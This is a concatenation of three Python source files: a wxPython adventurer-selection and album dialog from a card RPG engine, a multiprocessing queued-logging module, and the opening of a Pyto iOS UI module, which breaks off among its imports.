nsizer.Add(self.narrow_type, 0, wx.CENTER|wx.EXPAND, cw.wins(3))
nsizer.Add(self.sort_label, 0, wx.LEFT|wx.RIGHT|wx.CENTER, cw.wins(3))
nsizer.Add(self.sort, 0, wx.CENTER|wx.EXPAND, 0)
self.topsizer.Add(nsizer, 0, wx.EXPAND, 0)
def _on_narrowcondition(self):
cw.cwpy.setting.standbys_narrowtype = self.narrow_type.GetSelection()
self.update_narrowcondition()
self.draw(True)
def update_narrowcondition(self):
if 0 <= self.index and self.index < len(self.list):
selected = self.list[self.index]
else:
selected = None
if self.isalbum:
self.list = cw.cwpy.ydata.album[:]
else:
self.list = cw.cwpy.ydata.standbys[:]
narrow = self.narrow.GetValue().lower()
donarrow = self.narrow.IsShown() and bool(narrow)
if donarrow:
hiddens = set([u"_", u"@"])
attrs = set(cw.cwpy.setting.periodnames)
attrs.update(cw.cwpy.setting.sexnames)
attrs.update(cw.cwpy.setting.naturenames)
attrs.update(cw.cwpy.setting.makingnames)
_NARROW_ALL = 0
_NARROW_NAME = 1
_NARROW_DESC = 2
_NARROW_HISTORY = 3
_NARROW_FEATURES = 4
_NARROW_LEVEL = 5
ntype = self.narrow_type.GetSelection()
if ntype in (_NARROW_LEVEL, _NARROW_ALL):
# レベル
try:
intnarrow = int(narrow)
except:
intnarrow = None
ntypes = set()
if ntype == _NARROW_ALL:
ntypes.add(_NARROW_NAME)
ntypes.add(_NARROW_DESC)
ntypes.add(_NARROW_HISTORY)
ntypes.add(_NARROW_FEATURES)
ntypes.add(_NARROW_LEVEL)
else:
ntypes.add(ntype)
seq = []
for header in self.list:
def has_history():
for coupon in header.history:
if coupon:
if cw.cwpy.is_debugmode():
if coupon[0] == u"_" and coupon[1:] in attrs:
continue
else:
if coupon[0] in hiddens:
continue
if narrow in coupon.lower():
return True
return False
def has_features():
for coupon in header.history:
if coupon and coupon[0] == u"_":
coupon = coupon[1:]
if coupon in attrs:
if narrow in coupon.lower():
return True
return False
if (_NARROW_NAME in ntypes and narrow in header.name.lower()) or\
(_NARROW_DESC in ntypes and narrow in header.desc.lower()) or\
(_NARROW_HISTORY in ntypes and has_history()) or\
(_NARROW_FEATURES in ntypes and has_features()) or\
(_NARROW_LEVEL in ntypes and not intnarrow is None and header.level == intnarrow):
seq.append(header)
self.list = seq
if selected in self.list:
self.index = self.list.index(selected)
elif self.list:
self.index %= len(self.list)
else:
self.index = 0
self.enable_btn()
def OnNumberKeyDown(self, event):
"""
数値キー'1'~'9'までの押下を処理する。
PlayerSelectではソート条件の変更を行う。
"""
if self._processing:
return
if self.sort.IsShown():
index = self.sortkeydown.index(event.GetId())
if index < self.sort.GetCount():
self.sort.SetSelection(index)
event = wx.PyCommandEvent(wx.wxEVT_COMMAND_CHOICE_SELECTED, self.sort.GetId())
self.ProcessEvent(event)
def enable_btn(self):
# リストが空だったらボタンを無効化
disables = set()
# 冒険者が6人だったら追加ボタン無効化
if len(cw.cwpy.get_pcards()) == 6:
disables.add(self.addbtn)
if not self.list:
self._disable_btn((self.newbtn, self.closebtn, self.exbtn, self.viewbtn))
elif len(self.list) <= self.views:
disables.update((self.rightbtn, self.right2btn, self.leftbtn, self.left2btn))
self._enable_btn(disables)
if not self.list:
self.index = 0
else:
self._enable_btn(disables)
def OnSort(self, event):
if self._processing:
return
if self.isalbum:
return
index = self.sort.GetSelection()
if index == 1:
sorttype = "Name"
elif index == 2:
sorttype = "Level"
else:
sorttype = "None"
if cw.cwpy.setting.sort_standbys <> sorttype:
cw.cwpy.play_sound("page")
cw.cwpy.setting.sort_standbys = sorttype
cw.cwpy.ydata.sort_standbys()
self.update_narrowcondition()
self.draw(True)
def can_clickcenter(self):
return self.addbtn.IsEnabled()
def OnLeftDClick(self, event):
# 一覧表示の場合はダブルクリックで編入
if self._processing:
return
if len(cw.cwpy.get_pcards()) == 6:
return
MultiViewSelect.OnLeftDClick(self, event)
def OnMouseWheel(self, event):
if cw.util.has_modalchild(self):
return
if self._processing:
return
if change_combo(self.narrow_type, event):
return
elif change_combo(self.sort, event):
return
else:
MultiViewSelect.OnMouseWheel(self, event)
def OnSelect(self, event):
if self._processing:
return
if self.views == 1:
# 一人だけ表示している場合は編入
if not self.list or len(cw.cwpy.get_pcards()) == 6:
return
MultiViewSelect.OnSelect(self, event)
def OnClickNewBtn(self, event):
if self._processing:
return
cw.cwpy.play_sound("click")
if cw.cwpy.setting.debug:
title = cw.cwpy.msgs["select_creator"]
items = [
(cw.cwpy.msgs["create_normal"], cw.cwpy.msgs["create_normal_description"], self._create_normal, True),
(cw.cwpy.msgs["create_debug"], cw.cwpy.msgs["create_debug_description"], self._create_debug, True),
]
dlg = cw.dialog.etc.ExtensionDialog(self, title, items)
cw.cwpy.frame.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
else:
self._create_normal()
def _create_normal(self):
dlg = cw.dialog.create.AdventurerCreater(self)
cw.cwpy.frame.move_dlg(dlg)
self._create_common(dlg)
def _create_debug(self):
dlg = cw.debug.charaedit.CharacterEditDialog(self, create=True)
cw.cwpy.frame.move_dlg(dlg)
self._create_common(dlg)
def _create_common(self, dlg):
if dlg.ShowModal() == wx.ID_OK:
cw.cwpy.play_sound("page")
header = cw.cwpy.ydata.add_standbys(dlg.fpath)
# リスト更新
self.update_narrowcondition()
if header in self.list:
self.index = self.list.index(header)
self.enable_btn()
self.draw(True)
dlg.Destroy()
def get_selected(self):
if self.list:
return self.list[self.index]
else:
return None
def update_standbys(self, selected):
self.update_narrowcondition()
if selected and selected in self.list:
self.index = self.list.index(selected)
else:
if len(self.list):
self.index %= len(self.list)
else:
self.index = 0
self.enable_btn()
self.draw(True)
def OnClickAddBtn(self, event):
if self._processing:
return
self._processing = True
if not self.list:
return
header = self.list[self.index]
def func(panel, header, index):
if PlayerSelect._add(header):
def func(panel):
if panel:
panel._processing = False
self.update_narrowcondition()
if len(panel.list):
panel.index %= len(panel.list)
else:
panel.index = 0
panel.enable_btn()
panel.draw(True)
cw.cwpy.frame.exec_func(func, panel)
else:
def func(panel):
if panel:
panel._processing = False
cw.cwpy.frame.exec_func(func, panel)
cw.cwpy.exec_func(func, self, header, self.index)
@staticmethod
def _add(header):
assert threading.currentThread() == cw.cwpy
if cw.cwpy.ydata.party:
if len(cw.cwpy.ydata.party.members) < 6:
cw.cwpy.play_sound("harvest")
cw.cwpy.ydata.standbys.remove(header)
cw.cwpy.ydata.party.add(header)
if cw.cwpy.areaid == cw.AREA_BREAKUP:
cw.cwpy.create_poschangearrow()
return True
else:
# 追加できなかった
return False
else:
cw.cwpy.play_sound("harvest")
cw.cwpy.ydata.standbys.remove(header)
cw.cwpy.ydata.create_party(header, chgarea=False)
return True
def OnClickExBtn(self, event):
"""
拡張。
"""
if self._processing:
return
cw.cwpy.play_sound("click")
if self.list:
name = self.list[self.index].name
title = cw.cwpy.msgs["extension_title"] % (name)
else:
title = cw.cwpy.msgs["extension_title_2"]
items = [
(cw.cwpy.msgs["grow"], cw.cwpy.msgs["grow_adventurer_description"], self.grow_adventurer, bool(self.list)),
(cw.cwpy.msgs["delete"], cw.cwpy.msgs["delete_adventurer_description"], self.delete_adventurer, bool(self.list)),
(cw.cwpy.msgs["select_party_record"], cw.cwpy.msgs["select_party_record_description"], self.select_partyrecord, bool(cw.cwpy.ydata.party or cw.cwpy.ydata.partyrecord)),
(cw.cwpy.msgs["random_character"], cw.cwpy.msgs["random_character_description"], self.create_randomadventurer, True),
(cw.cwpy.msgs["random_team"], cw.cwpy.msgs["random_team_description"], self.random_team, bool(cw.cwpy.ydata.standbys and self.addbtn.IsEnabled()))
]
dlg = cw.dialog.etc.ExtensionDialog(self, title, items)
cw.cwpy.frame.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
def grow_adventurer(self):
"""冒険者を成長させる。
"""
header = self.list[self.index]
age = header.age
index = cw.cwpy.setting.periodcoupons.index(age)
#TODO 成長禁止処理
#if header.nogrow:
# cw.cwpy.play_sound("error")
# return
if index < 0:
# 年代が不正。スキンが違う場合は発生しうる
cw.cwpy.play_sound("error")
return
if index == len(cw.cwpy.setting.periodcoupons) - 1:
nextage= None
s = cw.cwpy.msgs["confirm_die"] % (header.name)
else:
nextage= cw.cwpy.setting.periodcoupons[index + 1]
s = cw.cwpy.msgs["confirm_grow"] % (header.name, age[1:], nextage[1:])
cw.cwpy.play_sound("signal")
dlg = cw.dialog.message.YesNoMessage(self, cw.cwpy.msgs["message"], s)
cw.cwpy.frame.move_dlg(dlg)
if dlg.ShowModal() == wx.ID_OK:
dlg.Destroy()
cw.cwpy.play_sound("harvest")
if nextage:
header.grow()
else:
s = cw.cwpy.msgs["die_message"] % (header.name)
dlg = cw.dialog.message.Message(self, cw.cwpy.msgs["message"], s, 2)
cw.cwpy.frame.move_dlg(dlg)
dlg.ShowModal()
self._move_allcards(header)
if not header.leavenoalbum:
path = cw.xmlcreater.create_albumpage(header.fpath)
cw.cwpy.ydata.add_album(path)
for partyrecord in cw.cwpy.ydata.partyrecord:
partyrecord.vanish_member(header.fpath)
cw.cwpy.ydata.remove_emptypartyrecord()
cw.cwpy.remove_xml(header)
cw.cwpy.ydata.standbys.remove(header)
for partyrecord in cw.cwpy.ydata.partyrecord:
partyrecord.vanish_member(header.fpath)
cw.cwpy.ydata.remove_emptypartyrecord()
self.update_narrowcondition()
if len(self.list):
self.index %= len(self.list)
else:
self.index = 0
self.enable_btn()
self.draw(True)
else:
dlg.Destroy()
def delete_adventurer(self):
"""冒険者を削除する。
"""
cw.cwpy.play_sound("signal")
header = self.list[self.index]
s = cw.cwpy.msgs["confirm_delete_character"] % (header.name)
dlg = cw.dialog.message.YesNoMessage(self, cw.cwpy.msgs["message"], s)
cw.cwpy.frame.move_dlg(dlg)
if dlg.ShowModal() == wx.ID_OK:
cw.cwpy.play_sound("dump")
self._delete_adventurer(header)
self.enable_btn()
self.draw(True)
dlg.Destroy()
def _move_allcards(self, header):
# 全ての手札カードをカード置場へ移動する
data = cw.data.yadoxml2etree(header.fpath)
ccard = cw.character.Character(data)
for pocket in ccard.cardpocket:
for card in pocket[:]:
cw.cwpy.trade("STOREHOUSE", header=card, from_event=True, sort=False)
cw.cwpy.ydata.sort_storehouse()
def _delete_adventurer(self, header):
if cw.cwpy.ydata:
cw.cwpy.ydata.changed()
self._move_allcards(header)
# レベル3以上・"_消滅予約"を持ってない場合、アルバムに残す
#if header.level >= 3 and not header.leavenoalbum:
# path = cw.xmlcreater.create_albumpage(header.fpath, nocoupon=True)
# cw.cwpy.ydata.add_album(path)
for partyrecord in cw.cwpy.ydata.partyrecord:
partyrecord.vanish_member(header.fpath)
cw.cwpy.ydata.remove_emptypartyrecord()
cw.cwpy.remove_xml(header)
cw.cwpy.ydata.standbys.remove(header)
for partyrecord in cw.cwpy.ydata.partyrecord:
partyrecord.vanish_member(header.fpath)
cw.cwpy.ydata.remove_emptypartyrecord()
self.update_narrowcondition()
if len(self.list):
self.index %= len(self.list)
else:
self.index = 0
def select_partyrecord(self):
"""編成記録ダイアログを開く。
"""
cw.cwpy.play_sound("click")
dlg = cw.dialog.partyrecord.SelectPartyRecord(self)
self.Parent.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
def random_team(self):
"""ランダムな編成のチームを組む。
"""
if self._processing:
return
self._processing = True
def func(panel):
class Pocket(object):
def __init__(self, header, point):
self.header = header
self.point = point
while cw.cwpy.ydata.standbys and (not cw.cwpy.ydata.party or\
len(cw.cwpy.ydata.party.members) < 6):
if cw.cwpy.ydata:
cw.cwpy.ydata.changed()
if not cw.cwpy.ydata.party:
PlayerSelect._add(cw.cwpy.dice.choice(cw.cwpy.ydata.standbys))
else:
seq = self.calc_needs(cw.cwpy.ydata.standbys)
seq2 = []
for need, header in cw.cwpy.dice.shuffle(seq):
point = cw.cwpy.dice.roll(1, need)
seq2.append(Pocket(header, point))
cw.util.sort_by_attr(seq2, "point")
PlayerSelect._add(seq2[0].header)
def func(panel):
if panel:
panel._processing = False
panel.update_narrowcondition()
if len(panel.list):
panel.index %= len(panel.list)
else:
panel.index = 0
panel.enable_btn()
panel.draw(True)
cw.cwpy.frame.exec_func(func, panel)
cw.cwpy.exec_func(func, self)
def create_randomadventurer(self, ex=False):
"""ランダムな特性を持つキャラクターを生成する。
"""
if self._processing:
return
self._processing = True
cw.cwpy.play_sound("signal")
info = cw.debug.charaedit.CharaInfo(None)
info.set_randomfeatures()
fpath = info.create_adventurer(setlevel=False)
header = cw.cwpy.ydata.add_standbys(fpath)
# リスト更新
self.narrow.SetValue(u"")
self.update_narrowcondition()
if header in self.list:
self.index = self.list.index(header)
chgviews = self.views <> 1
if chgviews:
self.change_view()
self.draw(True)
# *Names.txtファイルがある時は初期名を決める
sex = header.get_sex()
randomname = cw.dialog.create.get_randomname(sex)
def random_name():
return cw.dialog.create.get_randomname(sex)
addition = cw.cwpy.msgs["auto"] if cw.cwpy.setting.show_autobuttoninentrydialog else ""
addition_func = random_name if cw.cwpy.setting.show_autobuttoninentrydialog else None
dlg = cw.dialog.edit.InputTextDialog(self, cw.cwpy.msgs["naming"],
cw.cwpy.msgs["naming_random_character"],
text=randomname,
maxlength=14,
addition=addition,
addition_func=addition_func)
self.Parent.move_dlg(dlg, point=(cw.wins(130), cw.wins(0)))
if dlg.ShowModal() == wx.ID_OK:
if cw.cwpy.ydata:
cw.cwpy.ydata.changed()
cw.cwpy.play_sound("harvest")
data = cw.data.yadoxml2etree(header.fpath)
ccard = cw.character.Character(data)
ccard.set_name(dlg.text)
ccard.data.is_edited = True
ccard.data.write_xml()
header.name = dlg.text
else:
cw.cwpy.play_sound("dump")
self._delete_adventurer(header)
dlg.Destroy()
if chgviews:
self.change_view()
self.draw(True)
self.enable_btn()
self._processing = False
def OnClickInfoBtn(self, event):
if self._processing:
return
cw.cwpy.play_sound("click")
dlg = charainfo.StandbyCharaInfo(self, self.list, self.index, self.update_character)
self.Parent.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
def update_character(self):
def func():
header = self.list[self.index]
order = header.order
if self.isalbum:
index = cw.cwpy.ydata.album.index(header)
header = cw.cwpy.ydata.create_advheader(header.fpath)
header.order = order
cw.cwpy.ydata.album[index] = header
else:
index = cw.cwpy.ydata.standbys.index(header)
header = cw.cwpy.ydata.create_advheader(header.fpath)
header.order = order
cw.cwpy.ydata.standbys[index] = header
self.list[self.index] = header
self.update_narrowcondition()
cw.cwpy.frame.exec_func(self.draw, True)
cw.cwpy.exec_func(func)
def calc_needs(self, mlist):
"""mlist内のメンバに対して、現在のパーティの構成から
パーティにおける必要度を計算する。
レベルが近く、同型のメンバが少ないほど必要度が高くなる。
"""
if cw.cwpy.ydata.party:
talents = set(cw.cwpy.setting.naturecoupons)
types = {}
level = 0.0
seq = []
for member in cw.cwpy.get_pcards():
level += member.level
talent = member.get_talent()
val = types.get(talent, 0)
val += 1
types[talent] = val
level /= len(cw.cwpy.ydata.party.members)
for header in mlist:
# 同型のメンバの数だけ必要度を下げる
need = 10
talent = cw.cwpy.setting.naturecoupons[0]
for coupon in header.history:
if coupon in talents:
talent = coupon
break
val = types.get(talent, 0)
for _i in xrange(val):
need *= 2
# レベルが離れているほど必要度を下げる
val = level - header.level
if val < 0:
val = -val
for _i in xrange(int(val+0.5)):
need *= 4
seq.append((int(need), header))
return seq
else:
return [(10, header) for header in mlist]
def _get_bg(self):
if self._bg:
return self._bg
path = "Table/Book"
path = cw.util.find_resource(cw.util.join_paths(cw.cwpy.skindir, path), cw.cwpy.rsrc.ext_img)
self._bg = cw.util.load_wxbmp(path, can_loaded_scaledimage=True)
return self._bg
def draw(self, update=False):
dc = MultiViewSelect.draw(self, update)
# 背景
bmp = cw.wins(self._get_bg())
bmpw = bmp.GetSize()[0]
dc.DrawBitmap(bmp, 0, 0, False)
if self.list:
if self.views == 1:
header = self.list[self.index % len(self.list)]
# Level
dc.SetTextForeground(wx.BLACK)
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
s = cw.cwpy.msgs["character_level"]
w = dc.GetTextExtent(s)[0]
if header.level < 10:
dc.DrawText(s, cw.wins(64), cw.wins(42))
w = w + 5
else:
dc.DrawText(s, cw.wins(59), cw.wins(42))
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(25)))
s = str(header.level)
y = dc.GetTextExtent(s)[0]
dc.DrawText(s, cw.wins(65) + w, cw.wins(34))
w = w + y
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
s = cw.cwpy.msgs["character_class"]
dc.DrawText(s, cw.wins(70) + w, cw.wins(42))
# Name
dc.SetFont(cw.cwpy.rsrc.get_wxfont("inputname", pixelsize=cw.wins(22)))
s = header.name
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, cw.wins(125) - w / 2, cw.wins(67))
# Image
dc.SetClippingRect(cw.wins((88, 90, 74, 94)))
can_loaded_scaledimage = cw.util.str2bool(cw.header.GetRootAttribute(header.fpath).attrs.get("scaledimage", "False"))
for info in header.imgpaths:
path = cw.util.join_yadodir(info.path)
bmp = cw.util.load_wxbmp(path, True, can_loaded_scaledimage=can_loaded_scaledimage)
bmp2 = cw.wins(bmp)
baserect = info.calc_basecardposition_wx(bmp2.GetSize(), noscale=False,
basecardtype="LargeCard",
cardpostype="NotCard")
cw.imageretouch.wxblit_2bitbmp_to_card(dc, bmp2, cw.wins(88)+baserect.x, cw.wins(90)+baserect.y, True, bitsizekey=bmp)
dc.DestroyClippingRegion()
# Age
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
s = cw.cwpy.msgs["character_age"] % (header.get_age())
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, cw.wins(127) - w / 2, cw.wins(195))
# Sex
s = cw.cwpy.msgs["character_sex"] % (header.get_sex())
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, cw.wins(127) - w / 2, cw.wins(210))
# EP
s = cw.cwpy.msgs["character_ep"] % (header.ep)
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, cw.wins(127) - w / 2, cw.wins(225))
# クーポン(新しい順から9つ)
hiddens = set([u"_", u"@"])
dc.SetFont(cw.cwpy.rsrc.get_wxfont("charadesc", pixelsize=cw.wins(14)))
s = cw.cwpy.msgs["character_history"]
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, cw.wins(320) - w / 2, cw.wins(65))
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
history = []
for s in header.history:
if s and not s[0] in hiddens:
history.append(s)
if 9 < len(history):
history[-1] = cw.cwpy.msgs["history_etc"]
break
for index, s in enumerate(history):
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, cw.wins(320) - w / 2, cw.wins(95) + cw.wins(14) * index)
# ページ番号
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
s = str(self.index+1) if self.index > 0 else str(-self.index + 1)
s = s + " / " + str(len(self.list))
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, (bmpw-w)/2, cw.wins(250))
else:
page = self.get_page()
sindex = page * self.views
seq = self.list[sindex:sindex+self.views]
x = 0
y = 0
size = self.toppanel.GetSize()
rw = size[0] / (self.views / 2)
rh = size[1] / 2
dc.SetTextForeground(wx.BLACK)
for i, header in enumerate(seq):
# Image
ix = x + (rw - cw.wins(72)) / 2
iy = y + 5
dc.SetClippingRect((ix, iy, cw.wins(74), cw.wins(94)))
can_loaded_scaledimage = cw.util.str2bool(cw.header.GetRootAttribute(header.fpath).attrs.get("scaledimage", "False"))
for info in header.imgpaths:
path = cw.util.join_yadodir(info.path)
bmp = cw.util.load_wxbmp(path, True, can_loaded_scaledimage=can_loaded_scaledimage)
bmp2 = cw.wins(bmp)
baserect = info.calc_basecardposition_wx(bmp2.GetSize(), noscale=False,
basecardtype="LargeCard",
cardpostype="NotCard")
cw.imageretouch.wxblit_2bitbmp_to_card(dc, bmp2, ix+baserect.x, iy+baserect.y, True, bitsizekey=bmp)
dc.DestroyClippingRegion()
# Name
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
s = header.name
s = cw.util.abbr_longstr(dc, s, rw)
w = dc.GetTextExtent(s)[0]
cw.util.draw_witharound(dc, s, x + (rw - w) / 2, y + cw.wins(105))
# Level
space = cw.wins(5)
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
s1 = cw.cwpy.msgs["character_level"]
w1, h1 = dc.GetTextExtent(s1)
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(17)))
s2 = str(header.level)
w2, h2 = dc.GetTextExtent(s2)
sx = x + (rw - (w1+cw.wins(5)+w2+space)) / 2
sy = y + cw.wins(120)
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
cw.util.draw_witharound(dc, s1, sx, sy + (h2-h1))
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(17)))
cw.util.draw_witharound(dc, s2, sx + w1 + space + cw.wins(5), sy)
# Selected
if sindex + i == self.index:
bmp = cw.cwpy.rsrc.wxstatuses["TARGET"]
dc.DrawBitmap(bmp, ix + cw.wins(58), iy + cw.wins(80), True)
if self.views / 2 == i + 1:
x = 0
y += rh
else:
x += rw
# ページ番号
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
s = str(page+1) if page > 0 else str(-page + 1)
s = s + " / " + str(self.get_pagecount())
cw.util.draw_witharound(dc, s, cw.wins(5), cw.wins(5))
#-------------------------------------------------------------------------------
# アルバムダイアログ
#-------------------------------------------------------------------------------
class Album(PlayerSelect):
"""
アルバムダイアログ。
冒険者選択ダイアログを継承している。
"""
def __init__(self, parent):
# ダイアログボックス作成
Select.__init__(self, parent, cw.cwpy.msgs["album"])
self._bg = None
# 冒険者情報
self.list = cw.cwpy.ydata.album
self.isalbum = True
self.index = 0
self.views = 1
self.sort = None
# toppanel
self.toppanel = wx.Panel(self, -1, size=cw.wins((460, 280)))
# info
self.infobtn = cw.cwpy.rsrc.create_wxbutton(self.panel, wx.ID_PROPERTIES, cw.wins((90, 23)), cw.cwpy.msgs["information"])
self.buttonlist.append(self.infobtn)
# delete
self.delbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, wx.ID_DELETE, cw.wins((90, 23)), cw.cwpy.msgs["delete"])
self.buttonlist.append(self.delbtn)
# close
self.closebtn = cw.cwpy.rsrc.create_wxbutton(self.panel, wx.ID_CANCEL, cw.wins((90, 23)), cw.cwpy.msgs["close"])
self.buttonlist.append(self.closebtn)
# enable btn
self.enable_btn()
# layout
self._do_layout()
# bind
self._bind()
self.Bind(wx.EVT_BUTTON, self.OnClickInfoBtn, self.infobtn)
self.Bind(wx.EVT_BUTTON, self.OnClickDelBtn, self.delbtn)
def can_clickcenter(self):
return False
def OnMouseWheel(self, event):
Select.OnMouseWheel(self, event)
def OnKeyDown(self, event):
if event.GetKeyCode() == wx.WXK_DELETE and self.list:
return self.OnClickDelBtn(event)
def _add_topsizer(self):
pass
def update_narrowcondition(self):
pass
def OnClickDelBtn(self, event):
cw.cwpy.play_sound("signal")
header = self.list[self.index]
s = cw.cwpy.msgs["confirm_delete_character_in_album"] % (header.name)
dlg = cw.dialog.message.YesNoMessage(self, cw.cwpy.msgs["message"], s)
cw.cwpy.frame.move_dlg(dlg)
if dlg.ShowModal() == wx.ID_OK:
cw.cwpy.play_sound("dump")
cw.cwpy.remove_xml(header)
cw.cwpy.ydata.album.remove(header)
if len(self.list):
self.index %= len(self.list)
else:
self.index = 0
self.enable_btn()
self.draw(True)
dlg.Destroy()
def enable_btn(self):
# リストが空だったらボタンを無効化
if not self.list:
self._disable_btn((self.closebtn,))
elif len(self.list) == 1:
self._enable_btn((self.rightbtn, self.right2btn, self.leftbtn, self.left2btn))
else:
self._enable_btn()
def OnSelect(self, event):
pass
def change_combo(combo, event):
if combo and combo.IsShown() and combo.GetRect().Contains(event.GetPosition()):
index = combo.GetSelection()
count = combo.GetCount()
if cw.util.get_wheelrotation(event) > 0:
if index <= 0:
index = count - 1
else:
index -= 1
else:
if count <= index + 1:
index = 0
else:
index += 1
combo.Select(index)
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_CHOICE_SELECTED, combo.GetId())
combo.ProcessEvent(btnevent)
return True
else:
return False
def main():
pass
if __name__ == "__main__":
main()
|
logger.py
|
import logging
import os
from multiprocessing import Queue, Process
from dataclasses import dataclass
import time
from abc import ABC, abstractmethod
from enum import Enum
import sys
import traceback
from ml_gym.error_handling.exception import SingletonAlreadyInstantiatedError
class LogLevel(Enum):
CRITICAL = 50
FATAL = CRITICAL
ERROR = 40
WARNING = 30
WARN = WARNING
INFO = 20
DEBUG = 10
NOTSET = 0
@dataclass
class Message:
logger_id: str
message_string: str
unix_timestamp: float
level: LogLevel
class MLgymLoggerIF(ABC):
def __init__(self, logger_id: str):
self.logger_id = logger_id
def build_message(self, level: LogLevel, message) -> Message:
timestamp = time.time()
message = Message(message_string=message, unix_timestamp=timestamp, level=level, logger_id=self.logger_id)
return message
@abstractmethod
def log(self, level: LogLevel, message: str):
raise NotImplementedError
class ConsoleLogger(MLgymLoggerIF):
def __init__(self, logger_id: str):
super().__init__(logger_id)
self.logger = ConsoleLogger._get_console_logger(logger_id)
def log(self, level: LogLevel, message: str):
self.logger.log(level.value, message)
@staticmethod
def _get_console_logger(logger_id: str):
# create / get logger
logger = logging.getLogger(logger_id)
# if logger has not been created
if not logger.hasHandlers():
logger.setLevel(logging.DEBUG)
# create console handler with a higher log level
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
# create formatter and add it to the handlers
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(ch)
return logger
class QLogger(MLgymLoggerIF):
def __init__(self, logger_id: str, queue: Queue):
super().__init__(logger_id)
self.queue = queue
def log(self, level: LogLevel, message: str):
message = self.build_message(level, message)
self.queue.put(message)
class QueuedLogging:
_instance: "QueuedLogging" = None
@classmethod
def start_logging(cls, log_msg_queue: Queue, log_dir_path: str):
if cls._instance is None:
cls._instance = QueuedLogging(log_msg_queue, log_dir_path)
cls._instance._start_listening()
else:
raise SingletonAlreadyInstantiatedError()
@staticmethod
def get_qlogger(logger_id: str) -> QLogger:
return QLogger(logger_id, QueuedLogging._instance.log_msg_queue)
def __init__(self, log_msg_queue: Queue, log_dir_path: str):
if self._instance is not None:
raise SingletonAlreadyInstantiatedError()
self.log_msg_queue = log_msg_queue
self.log_dir_path = log_dir_path
self.listener_process = None
def _start_listening(self):
self.listener_process = Process(target=QueuedLogging._listener_process, args=(self.log_msg_queue, self.log_dir_path))
self.listener_process.start()
@staticmethod
def stop_listener():
QueuedLogging._instance.log_msg_queue.put_nowait(None)
@staticmethod
def _get_logger(log_dir_path: str, logger_id: str):
logger = logging.getLogger(logger_id)
log_file_path = os.path.join(log_dir_path, f"{logger_id}.log")
os.makedirs(os.path.dirname(log_file_path), exist_ok=True)
logger.setLevel(logging.DEBUG)
# create file handler which logs even debug messages
fh = logging.FileHandler(log_file_path)
fh.setLevel(logging.DEBUG)
# create console handler with a higher log level
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
# create formatter and add it to the handlers
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(fh)
logger.addHandler(ch)
return logger
@staticmethod
def _listener_process(queue: Queue, log_dir_path: str):
loggers = {}
while True:
try:
message: Message = queue.get()
if message is None: # We send this as a sentinel to tell the listener to quit.
break
if message.logger_id not in loggers:
loggers[message.logger_id] = QueuedLogging._get_logger(log_dir_path, message.logger_id)
loggers[message.logger_id].log(level=message.level.value, msg=message.message_string)
except Exception:
print('Whoops! Problem:', file=sys.stderr)
traceback.print_exc(file=sys.stderr)
def get_console_logger(name: str):
# create logger with 'spam_application'
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
# create console handler with a higher log level
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
# create formatter and add it to the handlers
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(ch)
return logger
|
pyto_ui.py
|
"""
UI for scripts
The ``pyto_ui`` module contains classes for building and presenting a native UI, in app or in the Today Widget.
This library's API is very similar to UIKit.
This library may have a lot of similarities with ``UIKit``, but subclassing isn't supported very well. Instead of overriding methods, you will often need to set properties to a function. For properties, setters are what makes the passed value take effect, so instead of override the getter, you should just set properties. If you really want to subclass a :class:`View`, you can set properties from the initializer.
(Many docstrings are quoted from the Apple Documentation)
"""
from __future__ import annotations
from UIKit import UIFont as __UIFont__, UIImage, UIView, UIViewController
from Foundation import NSThread, NSURL
from typing import List, Callable, Tuple
from pyto import __Class__, ConsoleViewController, PyAlert as __PyAlert__
from __check_type__ import check
from __image__ import __ui_image_from_pil_image__, __pil_image_from_ui_image__
from time import sleep
from io import BytesIO
from threading import Thread
from mainthread import mainthread
from inspect import signature
import __pyto_ui_garbage_collector__ as _gc
import os
import sys
import base64
import threading
import _values
import ui_constants
import builtins
import json
import warnings
import re
from timeit import default_timer as timer
try:
from rubicon.objc import ObjCClass, CGFloat
from rubicon.objc.api import NSString
except ValueError:
def ObjCClass(class_name):
return None
if "widget" not in os.environ:
from urllib.request import urlopen
try:
